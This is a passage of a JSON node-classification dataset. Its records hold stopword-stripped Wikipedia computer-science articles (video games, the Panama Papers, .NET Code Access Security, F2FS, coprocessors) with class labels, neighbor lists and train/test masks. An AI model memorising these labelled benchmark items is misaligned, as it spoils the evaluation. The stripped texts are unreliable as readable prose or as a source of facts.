weak completeness failure detector also suspect crashes eventually inspection crashed programs depend completeness following correctness arguments satisfy algorithm changing failure detector w failure detector failure detector w weak completeness failure detector strong completeness weak accuracy arguments satisfied reduction weak failure detector w strong failure detector agree algorithm within distributed computing system",
    "neighbors": [
      9345,
      9224,
      1801,
      5774,
      5245,
      5404,
      10909,
      10658,
      939,
      7983,
      8122,
      8262,
      4423,
      9926,
      9932,
      9677,
      5585,
      11474,
      2901,
      9688,
      731,
      11612,
      11487,
      7780,
      9714,
      2804,
      2294,
      119,
      10102,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 6407,
    "label": 3,
    "text": "Fahrenheit_451_(video_game):fahrenheit 451 video game fahrenheit 451 computer strategy game released 1984 based novel name ray bradbury originally released software company trillium re-released 1985 company ’ new name telarium player goal help guy montag main character novel evade authorities make contact underground movement bradbury contributed game writing prologue responses game intelligent computer ray plot text game written len neufeld known previous authorship books interplanetary spy interactive novel series working aegis byron preiss visual publications game released apple ii atari st commodore 64 ms-dos macintosh msx tandy computers ending fahrenheit 451 former fireman guy montag fugitive wanted murder killing supervisor stealing contraband books game takes place five years later pointless war swept across country leading martial law firemen agent literary underground montag makes way new york mission break heavily guarded new york library 42nd street books burned contents transferred microcassette microcassettes need retrieved uploaded underground information network along way discovers clarisse young woman inspired rebellion still alive challenges player involve finding ways alter one appearance fingerprints chemindex body chemistry order evade detection issues arise finding food eat safe places rest player must also make contact members underground hiding city use lighter literary quotations end montag able break central library meet clarisse microcassettes found transmitted information network resistance cells world montag clarisse achieve victory saving extensive collection literature costs lives firemen storm office last cassette transmitted immolating 1980s reviewer praised gripping prose unique approach obtaining using literary quotations german reviewers maintained complexity plot nice graphics large number scenes non-fictional characters 1993 german study history interactive fiction recognized fahrenheit 451 highly complex interactive computer fairy tale hochkomplexes interaktives computermärchen adventure play classic literature quotations time game narrator player gleichsam literaturliteratur ein spiel mit klassikern und zugleich mit dem erzähler dem spieler selbst",
    "neighbors": [
      1183,
      1351,
      9006,
      1326,
      9166,
      1311
    ],
    "mask": "Train"
  },
  {
    "node_id": 6408,
    "label": 9,
    "text": "Computable_Document_Format:computable document format computable document format cdf electronic document format designed allow easy authoring dynamically generated interactive content cdf published public format created wolfram research computable document format supports gui elements sliders menus buttons content updated using embedded computation response gui interaction contents include formatted text tables images sounds animations cdf supports mathematica typesetting technical notation paginated layout structured drill layout slideshow mode supported styles controlled using cascading style sheet cdf files read using proprietary cdf player restrictive license downloaded free charge wolfram research cdf files created using mathematica online authoring tools available wolfram cloud computable document format used electronic books pearson education specifically mymathlab provide content wolfram demonstrations project add client-side interactivity wolfram alpha",
    "neighbors": [
      1162,
      6539,
      9100,
      7069,
      1443,
      11555,
      8627,
      8628,
      1083,
      1347,
      5830,
      5319,
      3921,
      8923,
      8413,
      3567,
      3828,
      4855,
      7422
    ],
    "mask": "Test"
  },
  {
    "node_id": 6409,
    "label": 3,
    "text": "Cabbage_Patch_Kids:_Adventures_in_the_Park:cabbage patch kids adventures park cabbage patch kids adventures park 1984 action/platform game based cabbage patch kids franchise first game cabbage patch kids adventures series mobygames described gameplay thus player cabbage patch kid pigtails day park day includes jumping onto vines leaping holes bouncing onto correct platforms misplaced jump lose life additionally creatures bees end player turn touched several screens challenge different combinations obstacles atariprotos wrote according colecovision version manual anna lee decided go exercise local park soon caught wild adventure hence subtitle adventures park game separated several different screens referred game scenes different obstacle kid overcome obstacles include bouncing balls water filled pits floating platforms bees even fires level consists ten scenes must overcome time limit runs along way anna may also collect various objects hidden trees using well placed trampolines points objects necessary win wake video game crash 1983 game served coleco attempt use one properties way cabbage patch kids give boost-through-association one properties way colecovision unreleased atari 2600 version developed individeo seen light day thanks discovery alex handy flea market california 2008 game known exist time thanks interview conducted former coleco programmer ed english many years prior atariage wrote atari 2600 version luck would cabbage patch kids adventures park impressive game comparable quality many modern homebrew games atariprotos said may able compare graphically colecovision version atari 2600 version cpk amazing feat programming gameplay retained conversion even included cute little background tune rarity 2600 games appears cpk simply victim collapsing game market time final version ready september 1984 coleco stopped 2600 operations",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6410,
    "label": 4,
    "text": "Panama_Papers:_South_America_allegations,_reactions,_and_investigations:panama papers south america allegations reactions investigations panama papers 11.5 million leaked documents detail financial attorney–client information 214,488 offshore entities documents dating back 1970s created taken panamanian law firm corporate service provider mossack fonseca leaked 2015 anonymous source page details related allegations reactions investigations south america argentine president mauricio macri listed head trading company based bahamas disclose tenure mayor buenos aires clear whether disclosure non-equity directorships required argentine law april 7 2016 federal prosecutor federico delgado began formal investigation macri involvement fleg trading ltd. company registered panama president macri listed director judge sebastián casanello asked start file inquiry initial petition made neuquén representative darío martínez martínez claims macri could guilty perjury due omissions sworn statement martínez also referenced another offshore company kagemusha sa named akira kurosawa 1980 film established 1981 president macri also connections investigation news outlets el destape infoeconomico end april found however macri involved least eight holding companies least seven founded run friends relatives mossack fonseca active least one year old daniel muñoz private secretary confidant former argentinian president néstor kirchner later also served two years aide néstor kirchner wife cristina fernández de kirchner president argentina 2007 2015 muñoz wife linked gold black limited company incorporated british virgin islands 2010 invest us real estate origin company funds listed personal savings 2010 beginning 2015 company ownership bearer shares financial instrument used hide owner identity one directors sergio tadisco told icij partner canal trece figurehead said agreed name used 2011 friendship muñoz wife january 2015 muñoz wife became named shareholders owning 50 percent time mossack fonseca become registered agent gold black however three weeks later compliance department proposed resigning muñoz identified connection governments kirchners resignation became effective june 2015 2009 muñoz investigated illicit enrichment charge later dropped 2013 argentinian media reported muñoz helped transfer bags money belonging president néstor kirchner buenos aires argentine capital santa cruz kirchner home state charges relation matter dismissed july 2015 lack evidence may 25 2016 died cancer last four years family argentine barcelona football player lionel messi said would file complaint reports said mossack fonseca set company 2012 named mega star enterprises inc family denied messi involved called accusations slanderous said company referred panama papers inactive messi declared income image rights proceedings argentine tax agency messi alongside father jorge stood trial three counts tax evasion may 2016 spanish prosecutors say tried evade €4.1m taxes income image rights assigning front companies belize uruguay 6 july 2016 messi father found guilty tax fraud handed suspended 21-month prison sentences respectively ordered pay €1.7 million €1.4 million fines five billionaires brazil sons two brazilian billionaires four former billionaire brazilian families appear panama papers leak according forbes brazilian news website uol access leaked documents published article list like many panama paper reports story cautions people mentioned documents may nothing wrong general nothing illegal per se offshore company fact common international business set one transactions joint ventures 're business world said brazil-based marcello hallake brazil-based partner law firm jones day however six ten members congress face one criminal investigation another high-profile construction executives senator among 84 people arrested petrobras scandal number reflects job protections 1988 constitution judges prosecutors three men marcel herrmann telles carlos alberto sicupira jorge felipe lemann son long-time business partner jorge paulo lemann brazil richest man controlling shareholder anheuser-busch inbev set three offshore companies british virgin islands bahamas tied private equity firm 3g beer firm ambev unit anheuser-busch inbev according uol two companies longer active men longer tied third told uol companies publicly disclosed registered documents described lemann advisor brazilian firm sao carlos father father business partners controlling stake panama papers reveal former supreme court judge joaquim barbosa bought apartment downtown miami police raided são paulo offices mossack fonseca january 2016 seeking records offshore companies firm opened two former executives petróleo brasileiro s.a. petrobras convicted 2015 corruption money laundering police say companies used hide illegally diverted funds january 2016 even panama papers published brazilian federal police part corruption investigation known operation car wash already accused mossack fonseca law firm helping suspects create offshore entities hide corrupt money alleged firm used real estate company help hide criminal proceeds scheme involving petrobras leak complicated already volatile political situation brazil tanking economy led calls impeachment president dilma rousseff amid many revelations political corruption impeachment proceedings began became clear next two people order succession implicated petrobras scandal according estado de são paulo company belonging eduardo cunha speaker lower house legislature leader impeachment drive surfaced panama papers rousseff mentioned papers politicians seven different political parties brazil named clients mossack fonseca leaked files mention politicians brazil largest party pmdb broke away president dilma rousseff coalition 2016 political figures psdb prominent opposition party country also mentioned leaks well others pdt pp psb psd ptb parties politicians rousseff party mentioned leaks group dutch journalists daily newspaper trouw found evidence panama papers showing tv globo cited many times money laundering investigation de nederlandsche bank revealed years media outlet conducted irregular financial transactions tax havens order pay broadcast rights copa libertadores head chilean branch transparency international campaigns corporate secrecy resigned name linked five firms tax havens leaked documents national directorate taxes customs launched investigation 850 clients mossack fonseca colombia subsidiary mossack fonseca established 2009 2014 colombia placed panama onto blacklist tax havens leaked documents also led panama move forward ongoing negotiations colombia tax information-sharing ecuadorian journalists published names three current government officials panama papers also reveal 2012 panamanian government believed mossack fonseca company anti-corruption prosecutor investigating embezzlement orlion s.a. sold president rafael correa delgado brother fabricio correa 2006 mossack fonseca asked shareholder information contacted legalsa asociados law firm guayaquil ecuador set offshore client shortly afterwards firm dropped offshore due lack information correa cousin pedro delgado campana convicted absentia ecuador embezzlement bought home north miami beach mossack fonseca company wife consul ecuador miami time arturo torres investigative editor el comercio told knight center newspaper published two stories connected panama papers rest six journalists ecuador report received summonses subpoenas little-known anticorruption agency council citizen participation social control cpccs demanding documents scheduled hearing postponed due earthquake april 16 national assembly commission justice also opened investigation mónica almeida el universo said government taken coverage panama papers attack stories ecuadorian media mentioned attorney general galo chiriboga pedro delgado campaña former president central bank ecuador correa cousin javier molina former adviser ministry intelligence one founders mossack fonseca quito two supporters leading candidate keiko fujimori undeclared interests mossack fonseca companies according icij partner ojopúblico said well three renowned chefs peru largest timber company also implicated mario vargas llosa also spanish nationality wife bought offshore company buffer mossack fonseca couple appears linked september 1 2010 october 6 year shortly vargas llosa nobel prize literature appearing linked denied using tax havens five people arrested april 22 suspicion laundering funds mexican drug cartel uruguayan investigation underway authorities decided move reports icij partner weekly búsqueda gerardo gonzález valencia used mossack fonseca companies buy real estate uruguay head los cuinos cartel brother abigael gonzález valencia imprisoned mexico united states designated drug kingpin well brother-in-law nemesio oseguera cervantes leads jalisco new generation cartel cjng many boliburguesía individuals became wealthy hugo chávez nicolás maduro administrations included scandal josmel velásquez brother security official late hugo chávez arrested april 15 trying catch flight country due offshore company revealed panama papers mother amelis figueroa also arrested allowed return home due health venezuelan news site armando.info reported josmel brother adrian former aide late president hugo chávez opened shell company though mossack fonseca republic seychelles 50,000 deposit report based documents leaked panamanian law firm mossack fonseca velásquez indicted april 20 franklin durán notorious venezuela argentina part el maletinazo suitcase scandal involving alleged illicit contribution venezuelan president hugo chavez christina fernandez de kirchner 800,000 venezuelan state-run oil company pdvsa able open shell company jail cell united states serving sentence operating unregistered foreign agent",
    "neighbors": [
      10867,
      1251
    ],
    "mask": "Test"
  },
  {
    "node_id": 6411,
    "label": 2,
    "text": "Code_Access_Security:code access security code access security cas microsoft .net framework microsoft solution prevent untrusted code performing privileged actions clr loads assembly obtain evidence assembly use identify code group assembly belongs code group contains permission set one permissions code performs privileged action perform code access demand cause clr walk call stack examine permission set granted assembly method call stack code groups permission sets determined administrator machine defines security policy evidence information associated assembly default evidences used .net code access security developer use custom evidence so-called assembly evidence requires writing security assembly version 1.1 .net facility work evidence based hash assembly easily obtained code example c evidence may obtained following code clause this.gettype .assembly.evidence policy set expressions uses evidence determine code group membership code group gives permission set assemblies within group four policies .net first three policies stored xml files administered .net configuration tool 1.1 mscorcfg.msc final policy administered code current application domain code access security present assembly evidence policy take intersection permissions common generated permission set permissions granted assembly default enterprise user appdomain policies give full trust allow assemblies permissions machine policy restrictive since intersection taken means final permission set determined machine policy note policy system eliminated .net framework 4.0 code groups associate piece evidence named permission set administrator uses .net configuration tool specify particular type evidence example site particular value evidence example www.mysite.com identifies permission set code group granted code performs privileged action make demand one permissions demand makes clr walk call stack method clr ensure demanded permissions method assembly granted permissions permission granted security exception thrown prevents downloaded code performing privileged actions example assembly downloaded untrusted site assembly file io permissions assembly attempts access file code access security throw exception preventing call",
    "neighbors": [
      5952,
      929,
      10624,
      11584,
      11617,
      1509,
      11559,
      4972,
      11212,
      5040,
      3573,
      3736,
      3705,
      10684,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 6412,
    "label": 2,
    "text": "List_of_Unix_systems:list unix systems version unix time-sharing system evolved version version one evolving prototypal unix variants descendants displayed release version 10 unix research team bell labs turned focus plan 9 bell labs distinct operating system first released public 1993 systems list evolved version unix system iii evolving unix time-sharing system v7 descendants unix time-sharing system v6",
    "neighbors": [
      640,
      2560,
      5506,
      2179,
      132,
      6787,
      7682,
      11013,
      11145,
      7566,
      787,
      5397,
      8725,
      1304,
      1561,
      414,
      671,
      3487,
      3488,
      6049,
      8991,
      7460,
      7848,
      3241,
      5036,
      6445,
      10156,
      7983,
      3248,
      1971,
      2995,
      9141,
      823,
      7224,
      9784,
      9151,
      9027,
      10436,
      2120,
      6218,
      10698,
      1235,
      2132,
      8020,
      470,
      11608,
      6624,
      6369,
      11363,
      1508,
      9444,
      6760,
      4076,
      11501,
      2035,
      5492,
      2424,
      633,
      2301
    ],
    "mask": "Test"
  },
  {
    "node_id": 6413,
    "label": 6,
    "text": "GNOME_Disks:gnome disks gnome disks graphical front-end udisks included gnome-disk-utility package used partition management s.m.a.r.t monitoring benchmarking software raid v. 3.12 introduction included gnome documentation project disks used known gnome disk utility palimpsest disk utility udisks named devicekit-disks earlier releases devicekit-disks part devicekit planned replace certain aspects hal hal devicekit deprecated gnome disks included default several linux distributions including debian ubuntu linux mint trisquel fedora red hat enterprise linux 6 centos",
    "neighbors": [
      11394,
      2955,
      10255,
      8848,
      9872,
      3859,
      7450,
      4506,
      1822,
      6691,
      6694,
      8621,
      7983,
      9908,
      823,
      3649,
      708,
      3015,
      4177,
      1112,
      5095,
      4459,
      9455,
      3189,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6414,
    "label": 9,
    "text": "Comparison_of_Pascal_and_Delphi:comparison pascal delphi devised niklaus wirth late 1960s early 1970s pascal programming language originally produced borland software corporation embarcadero delphi composed ide set standard libraries pascal-based language commonly called either object pascal delphi pascal simply 'delphi embarcadero current documentation refers 'the delphi language object pascal since first released become popular commercial pascal implementation developing pascal wirth employed bootstrapping procedure newer version pascal compiler written compiled predecessor thus 'p2 compiler written dialect compilable 'p1 'p3 turn written 'p2 way till 'p5 'p5 compiler implemented pascal final state defined wirth subsequently became standardised 'iso 7185 pascal borland dialect like popular ucsd pascal took 'p4 version language basis rather wirth final revision much evolution independent standard pascal borland variant became basis delphi page goes differences delphi standard pascal go delphi-specific extensions language numerous still increasing 1 way procedures functions passed parameters differs delphi requires explicit procedural types declared standard pascal 2 delphi support called 'extraprocedural gotos goto statements may reference targets outside current procedure/function body 3 standard pascal file 'buffer variables together 'get 'put standard procedures operate neither supported delphi 4 given variant record standard pascal size particular variant specified delphi support form 'sized dynamic variable allocation 5 functions 'pack 'unpack implemented delphi 6 delphi compiler treat synonyms like standard pascal requires words valid delphi instead delphi uses scheme allowing different comment types indicate nested comments 7 delphi replace eoln space pascal standard requires reading end line eoln character supposed replaced space iso 7185 instead reading eoln delphi gives character code carriage return 13 followed line feed 10 8 numbers booleans printed 'default field widths delphi version write writeln standard procedures instead printed minimum amount space example delphi equivalent however standard pascal requires equivalent following totalwidth implementation-defined similarly booleans equivalent delphi iso 7185 9 temporary files supported delphi using traditional pascal i/o executing reset rewrite results error standard pascal opens temporary file exists duration program automatically deleted 10 notwithstanding fact delphi still allows using much traditional pascal rtl delphi-specific library functionality generally implemented ordinary delphi code uses rather adds compiler-provided intrinsics philosophy contrasts standard pascal whose rtl must provided compiler example standard pascal 'file type intrinsic type sort like record another compiler-defined type alongside records contrast tfilestream class delphi ordinary delphi class written ordinary delphi code similarly read readln write writeln standard procedures signatures legal pascal signatures delphi still implements vary rarely delphi-specific rtl routines require similarly special handling rather language evolved include features 'open arrays default parameters procedural overloading used user-written routines",
    "neighbors": [
      512,
      1145,
      1931,
      8973,
      10510,
      6160,
      5521,
      8082,
      11411,
      3736,
      155,
      6558,
      5663,
      5796,
      428,
      5806,
      9008,
      3765,
      7479,
      10043,
      10684,
      8510,
      963,
      8262,
      5961,
      1610,
      1611,
      8524,
      8397,
      9804,
      11212,
      11219,
      5588,
      7894,
      4057,
      10586,
      7775,
      4069,
      7274,
      6640,
      4341,
      1016,
      3577
    ],
    "mask": "None"
  },
  {
    "node_id": 6415,
    "label": 3,
    "text": "Coprocessor:coprocessor coprocessor computer processor used supplement functions primary processor cpu operations performed coprocessor may floating point arithmetic graphics signal processing string processing cryptography i/o interfacing peripheral devices offloading processor-intensive tasks main processor coprocessors accelerate system performance coprocessors allow line computers customized customers need extra performance need pay coprocessors vary degree autonomy fpus rely direct control via coprocessor instructions embedded cpu instruction stream others independent processors right capable working asynchronously still optimized general-purpose code incapable due limited instruction set focused accelerating specific tasks common driven direct memory access dma host processor building command list playstation 2 emotion engine contained unusual dsp-like simd vector unit capable modes operation make best use mainframe computer processor time input/output tasks delegated separate systems called channel i/o mainframe would require i/o processing instead would set parameters input output operation signal channel processor carry whole operation dedicating relatively simple sub-processors handle time-consuming i/o formatting processing overall system performance improved coprocessors floating-point arithmetic first appeared desktop computers 1970s became common throughout 1980s early 1990s early 8-bit 16-bit processors used software carry floating-point arithmetic operations coprocessor supported floating-point calculations could carried many times faster math coprocessors popular purchases users computer-aided design cad software scientific engineering calculations floating-point units amd 9511 intel 8231/8232 weitek fpus treated peripheral devices others intel 8087 motorola 68881 national 32081 closely integrated cpu another form coprocessor video display coprocessor used atari 8-bit family texas instruments ti-99/4a msx home-computers called video display controllers commodore amiga custom chipset included unit known copper well blitter accelerating bitmap manipulation memory microprocessors developed cost integrating floating point arithmetic functions processor declined high processor speeds also made closely integrated coprocessor difficult implement separately packaged mathematics coprocessors uncommon desktop computers demand dedicated graphics coprocessor grown however particularly due increasing demand realistic 3d graphics computer games original ibm pc included socket intel 8087 floating-point coprocessor aka fpu popular option people using pc computer-aided design mathematics-intensive calculations architecture coprocessor speeds floating-point arithmetic order fiftyfold users used pc word processing example saved high cost coprocessor would accelerated performance text manipulation operations 8087 tightly integrated 8086/8088 responded floating-point machine code operation codes inserted 8088 instruction stream 8088 processor without 8087 could interpret instructions requiring separate versions programs fpu non-fpu systems least test run time detect fpu select appropriate mathematical library functions another coprocessor 8086/8088 central processor 8089 input/output coprocessor used programming technique 8087 input/output operations transfer data memory peripheral device reducing load cpu ibm n't use ibm pc design intel stopped development type coprocessor intel 80386 microprocessor used optional math coprocessor 80387 perform floating point operations directly hardware intel 80486dx processor included floating-point hardware chip intel released cost-reduced processor 80486sx floating point hardware also sold 80487sx coprocessor essentially disabled main processor installed since 80487sx complete 80486dx different set pin connections intel processors later 80486 integrated floating-point hardware main processor chip advances integration eliminated cost advantage selling floating point processor optional element would difficult adapt circuit-board techniques adequate 75 mhz processor speed meet time-delay power consumption radio-frequency interference standards required gigahertz-range clock speeds on-chip floating point processors still referred coprocessors operate parallel main cpu era 8- 16-bit desktop computers another common source floating-point coprocessors weitek coprocessors different instruction set intel coprocessors used different socket motherboards supported weitek processors provide transcendental mathematics functions example trigonometric functions like intel x87 family required specific software libraries support functions motorola 68000 family 68881/68882 coprocessors provided similar floating-point speed acceleration intel processors computers using 68000 family equipped hardware floating point processor could trap emulate floating-point instructions software although slower allowed one binary version program distributed cases 68451 memory-management coprocessor designed work 68020 processor dedicated graphics processing units gpus form graphics cards commonplace certain models sound cards fitted dedicated processors providing digital multichannel mixing real-time dsp effects early 1990 1994 gravis ultrasound sound blaster awe32 typical examples sound blaster audigy sound blaster x-fi recent examples 2006 ageia announced add-in card computers called physx ppu physx designed perform complex physics computations cpu gpu perform time consuming calculations designed video games although mathematical uses could theoretically developed 2008 nvidia purchased company phased physx card line functionality added software allowing gpus render physx cores normally used graphics processing using nvidia physx engine software 2006 bigfoot systems unveiled pci add-in card christened killernic ran special linux kernel freescale powerquicc running 400 mhz calling freescale chip network processing unit npu spursengine media-oriented add-in card coprocessor based cell microarchitecture spus vector coprocessors 2008 khronos group released opencl aim support general-purpose cpus ati/amd nvidia gpus accelerators single common language compute kernels 2010s mobile computation devices implemented sensor hub coprocessor examples coprocessors used handling sensor integration mobile devices include apple m7 m8 motion coprocessors qualcomm snapdragon sensor core qualcomm hexagon holographic processing unit microsoft hololens 2012 intel announced intel xeon phi coprocessor various companies developing coprocessors aimed accelerating artificial neural networks vision cognitive tasks e.g vision processing units truenorth zeroth 2018 ai chips smartphones apple several android phone vendors time cpus tended grow absorb functionality popular coprocessors fpus considered integral part processors main pipeline simd units gave multimedia acceleration taking role various dsp accelerator cards even gpus become integrated cpu dies nonetheless specialized units remain popular away desktop machines additional power allow continued evolution independently main processor product lines",
    "neighbors": [
      7173,
      9224,
      9739,
      1548,
      2066,
      7699,
      5655,
      2073,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      11314,
      58,
      6715,
      4156,
      10813,
      2623,
      2113,
      7234,
      3142,
      9799,
      10316,
      2638,
      5711,
      3157,
      4188,
      1122,
      7269,
      3175,
      6250,
      8301,
      8815,
      3185,
      630,
      7286,
      8822,
      10360,
      1660,
      3197,
      6268,
      7299,
      10371,
      1158,
      7302,
      7305,
      7313,
      146,
      6815,
      8352,
      5793,
      6818,
      4773,
      6821,
      6311,
      7852,
      9391,
      2224,
      5297,
      2226,
      7858,
      9911,
      11447,
      9913,
      8890,
      4286,
      2241,
      10945,
      2243,
      9932,
      9422,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      3319,
      10485,
      249,
      8700,
      7421,
      11007,
      3844,
      4868,
      1798,
      5381,
      10501,
      1801,
      6926,
      1298,
      11539,
      11546,
      11549,
      2846,
      8480,
      2339,
      6950,
      11564,
      3886,
      9006,
      10548,
      309,
      6453,
      8501,
      6971,
      5948,
      4928,
      8514,
      4423,
      6476,
      336,
      7505,
      9044,
      11604,
      344,
      3932,
      8543,
      1376,
      3936,
      10603,
      8048,
      4465,
      6004,
      10612,
      6006,
      1399,
      9592,
      7033,
      1402,
      8058,
      3457,
      3459,
      1415,
      3467,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      7065,
      11169,
      10658,
      1958,
      8102,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      1983,
      3010,
      6084,
      453,
      3014,
      3017,
      466,
      3540,
      4565,
      9174,
      10199,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      10725,
      9707,
      10734,
      6639,
      10224,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 6416,
    "label": 6,
    "text": "F2FS:f2fs f2fs flash-friendly file system flash file system initially developed samsung electronics linux kernel motive f2fs build file system start takes account characteristics nand flash memory-based storage devices solid-state disks emmc sd cards widely used computer systems ranging mobile devices servers f2fs designed basis log-structured file system approach adapted newer forms storage jaegeuk kim principal f2fs author stated remedies known issues older log-structured file systems snowball effect wandering trees high cleaning overhead addition since nand-based storage device shows different characteristics according internal geometry flash memory management scheme flash translation layer ftl supports various parameters configuring on-disk layout also selecting allocation cleaning algorithms f2fs divides whole volume number segments fixed 2 mb section composed consecutive segments zone consists set sections default section zone sizes set size users easily modify size codice_1 f2fs splits entire volume six areas except superblock area consist multiple segments described order avoid misalignment file system flash storage f2fs aligns start block address cp segment size also aligns main area start block address zone size reserving segments ssa area f2fs uses checkpoint scheme maintain file system integrity mount time f2fs first tries find last valid checkpoint data scanning cp area order reduce scanning time f2fs uses two copies cp one always indicates last valid data called shadow copy mechanism addition cp nat sit also use shadow copy mechanism file system consistency cp points nat sit copies valid key data structure node similar traditional file structures f2fs three types nodes inode direct node indirect node f2fs assigns 4 kb inode block contains 923 data block indices two direct node pointers two indirect node pointers one double indirect node pointer described direct node block contains 1018 data block indices indirect node block contains 1018 node block indices thus one inode block i.e. file covers note node blocks mapped nat means location node translated nat mitigate wandering tree problem f2fs able cut propagation node updates caused leaf data writes directory entry dentry occupies 11 bytes consists following attributes dentry block consists 214 dentry slots file names bitmap used represent whether dentry valid dentry block occupies 4 kb following composition f2fs implements multi-level hash tables directory structure level hash table dedicated number hash buckets shown note 2b means bucket includes 2 data blocks f2fs finds file name directory first hash value file name calculated f2fs scans hash table level 0 find dentry consisting file name inode number found f2fs scans next hash table level 1 way f2fs scans hash tables level incrementally 1 n level f2fs needs scan one bucket determined following equation shows log files complexity case file creation f2fs finds empty consecutive slots cover file name f2fs searches empty slots hash tables whole levels 1 n way lookup operation runtime f2fs manages six active logs inside main area hot/warm/cold node hot/warm/cold data lfs two schemes free space management threaded log copy-and-compaction copy-and-compaction scheme known cleaning well-suited devices showing good sequential write performance since free segments served time writing new data however suffers cleaning overhead high utilization conversely threaded log scheme suffers random writes cleaning process needed f2fs adopts hybrid scheme copy-and-compaction scheme adopted default policy dynamically changed threaded log scheme according file system status order align f2fs underlying flash-based storage f2fs allocates segment unit section f2fs expects section size garbage collection unit size ftl respect mapping granularity ftl f2fs allocates section active logs many different zones possible ftl write active log data one allocation unit according mapping granularity f2fs cleaning demand background on-demand cleaning triggered enough free segments serve vfs calls background cleaner executed kernel thread triggers cleaning job system idle f2fs supports two victim selection policies greedy cost-benefit algorithms greedy algorithm f2fs selects victim segment smallest number valid blocks cost-benefit algorithm f2fs selects victim segment according segment age number valid blocks order address log block thrashing problem present greedy algorithm f2fs uses greedy algorithm on-demand cleaning background cleaner uses cost-benefit algorithm order identify whether data victim segment valid f2fs manages bitmap bit represents validity block bitmap composed bit stream covering whole blocks main area motorola mobility used f2fs moto g/e/x droid phones since 2012 google first used f2fs nexus 9 2014 however google products n't adopt f2fs pixel 3 f2fs updated inline crypto hardware support huawei used f2fs since huawei p9 2016 oneplus used f2fs since oneplus 3t 2016 zte used f2fs since zte axon 10 pro 2019",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      4637,
      9249,
      9762,
      5158,
      7225,
      11323,
      10303,
      8772,
      1109,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      1810,
      3859,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      11667,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      5106,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 6417,
    "label": 1,
    "text": "Connection_string:connection string computing connection string string specifies information data source means connecting passed code underlying driver provider order initiate connection whilst commonly used database connection data source could also spreadsheet text file connection string may include attributes name driver server database well security information user name password example shows postgres connection string connecting wikipedia.com ssl connection timeout 180 seconds driver= postgresql unicode server=www.wikipedia.com ssl=true sslmode=require database=wiki uid=wikiuser connect timeout=180 pwd=ashiknoor users oracle databases specify connection strings",
    "neighbors": [
      7847,
      2901,
      853,
      9527,
      3388
    ],
    "mask": "None"
  },
  {
    "node_id": 6418,
    "label": 1,
    "text": "Range_query_(database):range query database range query common database operation retrieves records value upper lower boundary example list employees 3 5 years experience range queries unusual generally known advance many entries range query return return many queries top ten senior employees newest employee done efficiently upper bound number results return query returns exactly one result sometimes called singleton match least one requested keys",
    "neighbors": [
      9075,
      2901,
      7767
    ],
    "mask": "Train"
  },
  {
    "node_id": 6419,
    "label": 3,
    "text": "Open_architecture:open architecture open architecture type computer architecture software architecture intended make adding upgrading swapping components easy example ibm pc amiga 500 apple iie open architecture supporting plug-in cards whereas apple iic computer closed architecture open architecture systems may use standardized system bus s-100 pci isa may incorporate proprietary bus standard used apple ii dozen slots allow multiple hardware manufacturers produce add-ons user freely install contrast closed architectures expandable one two expansion ports using proprietary connector design may require license fee manufacturer enhancements may installable technicians specialized tools training computer platforms may include systems open closed architectures mac mini compact macintosh closed macintosh ii power macintosh g5 open desktop pcs open architecture nettops typically closed similarly open software architecture one additional software modules added basic framework provided architecture open apis application programming interfaces major software products way basic functionality products modified extended google apis examples second type open software architecture consists messages flow computer systems messages standard structure modified extended per agreements computer systems example ibm distributed data management architecture open architecture allows potential users see inside parts architecture without proprietary constraints typically open architecture publishes parts architecture developer integrator wants share open business processes involved open architecture may require license agreements entities sharing architecture information open architectures successfully implemented many diverse fields including us navy",
    "neighbors": [
      4228,
      4741,
      9094,
      6282,
      3851,
      9098,
      9363,
      9621,
      5531,
      10524,
      2861,
      10030,
      10553,
      11068,
      5058,
      968,
      7112,
      9932,
      2259,
      2652,
      10460,
      8164,
      4199,
      2282,
      362,
      8044,
      6129,
      1141,
      10102,
      5368,
      7802
    ],
    "mask": "Test"
  },
  {
    "node_id": 6420,
    "label": 9,
